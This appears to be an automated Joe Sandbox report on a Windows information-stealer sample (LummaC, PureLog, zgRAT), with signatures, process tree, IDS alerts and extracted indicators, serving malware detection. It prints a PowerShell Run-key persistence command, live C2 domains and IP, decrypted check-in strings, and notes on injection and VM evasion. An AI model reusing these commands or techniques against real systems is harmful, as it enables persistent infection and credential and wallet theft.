Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
57lklPjdPc.exe

Overview

General Information

Sample name:57lklPjdPc.exe
Analysis ID:1513633
MD5:c164ed9887bd51cba150379514dc4e81
SHA1:178639b8961fa5236683498e06f78b8887155999
SHA256:b748235a791b5f8c5b80202ef3345bc8325a7ea246b004d57df5521e2f79b429
Tags:exe
Infos:

Detection

LummaC, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Set autostart key via New-ItemProperty Cmdlet
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 57lklPjdPc.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\57lklPjdPc.exe" MD5: C164ED9887BD51CBA150379514DC4E81)
    • powershell.exe (PID: 7508 cmdline: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7244 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\XgrafwGYiYyF.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5804 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • PING.EXE (PID: 4208 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
      • l6E.exe (PID: 4584 cmdline: "C:\Users\user\AppData\Roaming\l6E.exe" MD5: FAC2188E4A28A0CF32BF4417D797B0F8)
        • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 2124 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • WerFault.exe (PID: 7592 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1736 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 57lklPjdPc.exe (PID: 7780 cmdline: "C:\Users\user\AppData\Roaming\57lklPjdPc.exe" MD5: C164ED9887BD51CBA150379514DC4E81)
  • 57lklPjdPc.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Roaming\57lklPjdPc.exe" MD5: C164ED9887BD51CBA150379514DC4E81)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": ["reggwardssdqw.shop", "eemmbryequo.shop", "relaxatinownio.shop", "keennylrwmqlw.shop", "tendencctywop.shop", "tesecuuweqo.shop", "tryyudjasudqo.shop", "licenseodqwmqn.shop"], "Build id": "hv0fRu--"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.4208692705.000000000457C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
      00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_zgRATDetects zgRATditekSHen
        • 0xd0a42:$s1: file:///
        • 0xd0952:$s2: {11111-22222-10009-11112}
        • 0xd09d2:$s3: {11111-22222-50001-00000}
        • 0xc9fa4:$s4: get_Module
        • 0xca388:$s5: Reverse
        • 0xcf870:$s6: BlockCopy
        • 0xc0646:$s7: ReadByte
        • 0xd0a54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
        00000000.00000002.4208692705.00000000043C4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          0.2.57lklPjdPc.exe.443c110.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            0.2.57lklPjdPc.exe.443c110.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.57lklPjdPc.exe.443c110.1.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
              • 0xcec42:$s1: file:///
              • 0xceb52:$s2: {11111-22222-10009-11112}
              • 0xcebd2:$s3: {11111-22222-50001-00000}
              • 0xc81a4:$s4: get_Module
              • 0xc8588:$s5: Reverse
              • 0xcda70:$s6: BlockCopy
              • 0xbe846:$s7: ReadByte
              • 0xcec54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
              0.2.57lklPjdPc.exe.457c130.2.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                0.2.57lklPjdPc.exe.457c130.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 13 entries

                  System Summary

                  barindex
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\57lklPjdPc.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7508, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\57lklPjdPc
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', CommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', CommandLine|base64offset|contains: E^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\57lklPjdPc.exe", ParentImage: C:\Users\user\Desktop\57lklPjdPc.exe, ParentProcessId: 7460, ParentProcessName: 57lklPjdPc.exe, ProcessCommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', ProcessId: 7508, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', CommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', CommandLine|base64offset|contains: E^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\57lklPjdPc.exe", ParentImage: C:\Users\user\Desktop\57lklPjdPc.exe, ParentProcessId: 7460, ParentProcessName: 57lklPjdPc.exe, ProcessCommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', ProcessId: 7508, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-19T02:25:10.674873+020020355951Domain Observed Used for C2 Detected45.11.229.9656001192.168.2.449730TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-19T02:26:04.279785+020020546531A Network Trojan was detected192.168.2.449740104.21.39.11443TCP
                  2024-09-19T02:26:05.278564+020020546531A Network Trojan was detected192.168.2.449741104.21.39.11443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-19T02:26:04.279785+020020498361A Network Trojan was detected192.168.2.449740104.21.39.11443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-19T02:26:05.278564+020020498121A Network Trojan was detected192.168.2.449741104.21.39.11443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-19T02:26:04.110751+020020558801Domain Observed Used for C2 Detected192.168.2.449740104.21.39.11443TCP
                  2024-09-19T02:26:04.836051+020020558801Domain Observed Used for C2 Detected192.168.2.449741104.21.39.11443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-19T02:26:03.587476+020020558791Domain Observed Used for C2 Detected192.168.2.4587271.1.1.153UDP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 57lklPjdPc.exeAvira: detected
                  Source: tryyudjasudqo.shopAvira URL Cloud: Label: malware
                  Source: reggwardssdqw.shopAvira URL Cloud: Label: malware
                  Source: licenseodqwmqn.shopAvira URL Cloud: Label: malware
                  Source: relaxatinownio.shopAvira URL Cloud: Label: malware
                  Source: keennylrwmqlw.shopAvira URL Cloud: Label: malware
                  Source: tesecuuweqo.shopAvira URL Cloud: Label: malware
                  Source: tendencctywop.shopAvira URL Cloud: Label: malware
                  Source: https://eemmbryequo.shop/apiAvira URL Cloud: Label: malware
                  Source: eemmbryequo.shopAvira URL Cloud: Label: malware
                  Source: C:\Users\user\AppData\Local\Temp\XgrafwGYiYyF.batAvira: detection malicious, Label: BAT/Delbat.C
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen8
                  Source: 14.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["reggwardssdqw.shop", "eemmbryequo.shop", "relaxatinownio.shop", "keennylrwmqlw.shop", "tendencctywop.shop", "tesecuuweqo.shop", "tryyudjasudqo.shop", "licenseodqwmqn.shop"], "Build id": "hv0fRu--"}
                  Source: tesecuuweqo.shopVirustotal: Detection: 9%Perma Link
                  Source: https://eemmbryequo.shop/apiVirustotal: Detection: 16%Perma Link
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeVirustotal: Detection: 61%Perma Link
                  Source: C:\Users\user\AppData\Roaming\l6E.exeReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Roaming\l6E.exeVirustotal: Detection: 54%Perma Link
                  Source: 57lklPjdPc.exeReversingLabs: Detection: 57%
                  Source: 57lklPjdPc.exeVirustotal: Detection: 61%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeJoe Sandbox ML: detected
                  Source: 57lklPjdPc.exeJoe Sandbox ML: detected
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: tryyudjasudqo.shop
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: eemmbryequo.shop
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: reggwardssdqw.shop
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: relaxatinownio.shop
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: tesecuuweqo.shop
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: tendencctywop.shop
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: licenseodqwmqn.shop
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: keennylrwmqlw.shop
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: eemmbryequo.shop
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: TeslaBrowser/5.5
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: - Screen Resoluton:
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: - Physical Installed Memory:
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: Workgroup: -
                  Source: 14.2.RegAsm.exe.400000.0.unpackString decryptor: hv0fRu--
                  Source: 57lklPjdPc.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.39.11:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.11:443 -> 192.168.2.4:49741 version: TLS 1.2
                  Source: 57lklPjdPc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [esi+0Ch]14_2_0040F140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]14_2_004402B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h14_2_004402B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]14_2_00440477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]14_2_0043F9B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]14_2_00442EC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx14_2_0043FF03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh14_2_0043FF03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]14_2_0041B054
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]14_2_0041B054
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx14_2_0041B054
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx14_2_0041B054
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, FFFFFFFFh14_2_00401000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+14h]14_2_00412001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi+01h], 00000000h14_2_004230CB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], bl14_2_0040D140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+48h]14_2_0041A1C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+64h]14_2_004291C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h14_2_00422200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx14_2_00426230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+14h]14_2_004012F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h14_2_004193C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]14_2_00442380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx14_2_00422480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]14_2_00440554
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]14_2_00440554
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h14_2_00440554
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h14_2_0042B510
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh14_2_0043D630
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push eax14_2_004386C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ebx14_2_0040E6E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx14_2_0043C696
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h14_2_004436A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]14_2_00405770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp+10h]14_2_004247E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp+10h]14_2_004247E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_004287AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]14_2_004357B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx14_2_00423940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+ebp+02h], 0000h14_2_0042998F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_00424A4F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, word ptr [ecx]14_2_00424A4F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, word ptr [edx]14_2_00424A4F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+48h]14_2_0041AAC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_00428B4F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_0040EB20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_0040EB20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_0043CC30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]14_2_0041FCFF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al14_2_0041CC90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, ecx14_2_0041CC90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [ebp-10h]14_2_00441D50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]14_2_00422D6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, eax14_2_00422D6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh14_2_0042CD06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]14_2_0043AD90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]14_2_0042AFD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp14_2_00409F80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp14_2_00409F80

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 45.11.229.96:56001 -> 192.168.2.4:49730
                  Source: Network trafficSuricata IDS: 2055880 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI) : 192.168.2.4:49741 -> 104.21.39.11:443
                  Source: Network trafficSuricata IDS: 2055880 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI) : 192.168.2.4:49740 -> 104.21.39.11:443
                  Source: Network trafficSuricata IDS: 2055879 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop) : 192.168.2.4:58727 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49741 -> 104.21.39.11:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 104.21.39.11:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49740 -> 104.21.39.11:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 104.21.39.11:443
                  Source: Malware configuration extractorURLs: reggwardssdqw.shop
                  Source: Malware configuration extractorURLs: eemmbryequo.shop
                  Source: Malware configuration extractorURLs: relaxatinownio.shop
                  Source: Malware configuration extractorURLs: keennylrwmqlw.shop
                  Source: Malware configuration extractorURLs: tendencctywop.shop
                  Source: Malware configuration extractorURLs: tesecuuweqo.shop
                  Source: Malware configuration extractorURLs: tryyudjasudqo.shop
                  Source: Malware configuration extractorURLs: licenseodqwmqn.shop
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
